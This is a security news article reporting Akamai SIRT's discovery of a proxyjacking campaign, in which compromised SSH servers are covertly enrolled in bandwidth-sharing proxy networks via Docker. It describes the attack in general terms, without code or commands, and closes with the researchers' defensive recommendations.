Threat actors are exploiting vulnerable Secure Shell Protocol (SSH) servers to launch Docker services that take advantage of an emerging and lucrative attack vector that hijacks a victim’s network bandwidth for money.
Investigators from the Akamai Security Intelligence Response Team (SIRT) discovered the currently active campaign in June, which uses an emerging type of attack called proxyjacking, the researchers revealed in a blog post last week.
Threat actors use SSH for remote access and then execute malicious scripts without their knowledge that place victim servers in a legitimate peer-to-peer (P2P) proxy network, such as Peer2Proxy or Honeygain, the researchers said. These networks – which use companion apps or software installed on devices connected to the internet — allow someone to share internet bandwidth by paying to use the app users IP address.
“This allows the attacker to monetize the extra bandwidth of an unsuspecting victim, with only a fraction of the resource load that would be required for crypto mining, with less chance of discovery,” Allen West, a SIRT security researcher, wrote in the post.
In a nutshell, that’s proxyjacking, an emerging attack model that exploits these services at scale and could potentially generate hundreds of thousands of dollars a month in passive income for cybercriminals, the researchers found.
While the idea of proxyjacking isn’t new, think of cryptojacking, a completely illegal venture, as a distant cousin — the ability to make easy money piggybacking on someone’s bandwidth as affiliates of mainstream companies is new, which explains why security researchers are seeing more proxyjacking in the threat landscape, West warned.
“By providing an easy path to financial gain, this vector poses a threat to both the corporate world and the average consumer, increasing the need for awareness and, hopefully, mitigation,” he wrote.
Proxy jacking also makes it easy for threat actors to cover their tracks by routing malicious traffic through a large number of peer nodes before reaching its final destination, the study said. This makes it difficult for victims or investigators to pinpoint the origin of the nefarious activity – another attractive option for attackers looking to monetize their activity without consequence.
How the attack works
The first indication of the attack that Akamai researchers identified came when an attacker established multiple SSH connections to one of the company’s honeypots using a duplicate Base64-encoded Bash script to cover up the activity. They successfully decoded the script and were able to observe the threat actor’s proxyjacking method down to the exact sequence of operations.
The script transformed the compromised system into a node in the Peer2Profit proxy network, using the account specified by $PACCT as the partner that will benefit from the shared bandwidth, according to Akamai SIRT. The same process was used a while later for a Honeygain installation.
“The script is designed to be unobtrusive and robust and attempts to run regardless of the software installed on the host system,” West wrote.
The script then performs several functions, including downloading an actual, unmodified version of cURL, a command-line utility that allows data to be exchanged between a device and a server through a terminal.
This tool appears to be all attackers need for the scheme to work, and “if it’s not present on the victim’s host, the attacker downloads it on their behalf,” West wrote.
The executable cancels all containers running on the node to install a Docker container to handle the proxyjacking process and once everything is in place the attacker can leave the network without a trace.
How do you defend against proxyjacking?
Due to the growing prevalence of and relative ease with which attackers can mount proxyjacking attacks, and the inability to identify the original perpetrators, organizations must remain vigilant on their networks to spot anomalous behavior in how their resources are used to compromise to avoid, the researchers recommend.
For the particular attack the Akamai team observed, attackers used SSH to access a server and install a Docker container. To prevent this type of attack, organizations can monitor their locally running Docker services to locate unwanted resources sharing the system, Akamai said. If they find one, the intrusion must be investigated and it must be determined how the script was uploaded and executed, after which organizations must conduct a thorough cleanup.
Also unique to the attack is that the executable in the form of the cURL tool is likely to be overlooked by most companies since that tool can be used legitimately. In this case, however, it was the first artifact in the attack that led the researchers to investigate more deeply, West said.
“It was the ability to look at the source of the artifact that took it from a harmless piece of code to what we know now as part of a proxyjacking scheme,” he explained, which “emphasizes the importance of being able to isolating all unusual artifacts, not just those considered malignant.”
Furthermore, because proxyjacking attackers also use vulnerabilities to launch attacks – that was the case with a recent attack that exploited the infamous Log4j flaw — Organizations should maintain updated assets and apply patches to applications when they become available, particularly when vulnerabilities have already been exploited, the study recommends.
Added West, “Users more knowledgeable about computer security can also stay vigilant by paying attention to the containers currently running, monitoring network traffic for anomalies, and even running regular vulnerability scans.”